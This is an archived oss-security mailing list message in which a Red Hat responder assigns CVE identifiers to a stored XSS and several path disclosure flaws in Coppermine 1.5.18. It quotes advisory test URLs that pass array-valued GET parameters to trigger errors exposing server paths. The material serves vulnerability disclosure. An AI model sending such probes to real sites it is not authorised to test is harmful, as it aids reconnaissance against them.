Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Tue, 03 Apr 2012 14:17:30 -0600
From: Kurt Seifried <kseifried@...hat.com>
To: oss-security@...ts.openwall.com
CC: Henri Salo <henri@...v.fi>
Subject: Re: CVE-request: Coppermine 1.5.18 waraxe-2012-SA#081

On 04/03/2012 04:56 AM, Henri Salo wrote:
> On Fri, Mar 30, 2012 at 11:36:23AM -0600, Kurt Seifried wrote:
>> What about the path disclosures?
> 
> I was not sure if those are really worth of CVE-identifier(s), but please do assign if you think those are needed. I do not see path disclosure issues as important security vulnerabilities especially if there is path disclosure issues in same version that there is other security vulnerabilities.

Everyone has different definitions and requirements so CVE basically
goes with "is it a security vulnerability" (e.g. does it cross a trust
boundary, etc.).

> If you ask me two 2012 CVE-identifiers are needed. Please correct me in case I am wrong.
> 
> 1. Stored XSS edit_one_pic.php keywords

Please use CVE-2012-1613 for this issue.

> 2. Multiple path disclosures in 1.5.18
> 2.1. visiblehookpoints plugin index.php
> 2.2. thumbnails.php GET parameters "page" and "cat"
> 2.3. usermgr.php GET parameter "page"
> 2.4. search.inc.php GET parameters "newer_than" and "older_than"

Please use CVE-2012-1614 for these issues.

> These issues (according to the advisory page) are fixed in: 1.5.20 (I have not tested these). Here is the copypaste from original advisory:
> 
> """
> ###############################################################################
> 2. Path Disclosure in "visiblehookpoints" plugin
> ###############################################################################
> 
> Test:
> 
> http://localhost/cpg1518/plugins/visiblehookpoints/index.php
> 
> Result:
> 
> Warning: require_once(include/init.inc.php) [function.require-once]:
> failed to open stream: No such file or directory in
> C:apache_wwwcpg1518pluginsvisiblehookpointsindex.php on line 22
> 
> Fatal error: require_once() [function.require]:
> Failed opening required 'include/init.inc.php' (include_path='.;C:phppear') in
> C:apache_wwwcpg1518pluginsvisiblehookpointsindex.php on line 22
> 
> 
> ###############################################################################
> 3. Path Disclosure in "thumbnails.php"
> ###############################################################################
> 
> Attack vector: user submitted GET parameters "page" and "cat"
> 
> Tests:
> 
> http://localhost/cpg1518/thumbnails.php?page[]
> http://localhost/cpg1518/thumbnails.php?cat[]
> 
> Results:
> 
> Fatal error: Unsupported operand types in
> C:apache_wwwcpg1518includefunctions.inc.php on line 2980
> 
> Fatal error: Unsupported operand types in
> C:apache_wwwcpg1518 humbnails.php on line 160
> 
> 
> 
> ###############################################################################
> 4. Path Disclosure in "usermgr.php"
> ###############################################################################
> 
> Attack vector: user submitted GET parameter "page"
> Preconditions: admin privileges needed
> 
> Test:
> 
> http://localhost/cpg1518/usermgr.php?page[]
> 
> Result:
> 
> Fatal error: Unsupported operand types in
> C:apache_wwwcpg1518usermgr.php on line 185
> 
> 
> ###############################################################################
> 5. Path Disclosure in "search.inc.php"
> ###############################################################################
> 
> Attack vector: user submitted GET parameters "newer_than" and "older_than"
> 
> Tests:
> 
> http://localhost/cpg1518/thumbnails.php?search=1&album=search&newer_than[]
> http://localhost/cpg1518/thumbnails.php?search=1&album=search&older_than[]
> 
> Results:
> 
> Fatal error: Unsupported operand types in
> C:apache_wwwcpg1518includesearch.inc.php on line 106
> 
> Fatal error: Unsupported operand types in
> C:apache_wwwcpg1518includesearch.inc.php on line 107
> """


-- 
Kurt Seifried Red Hat Security Response Team (SRT)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.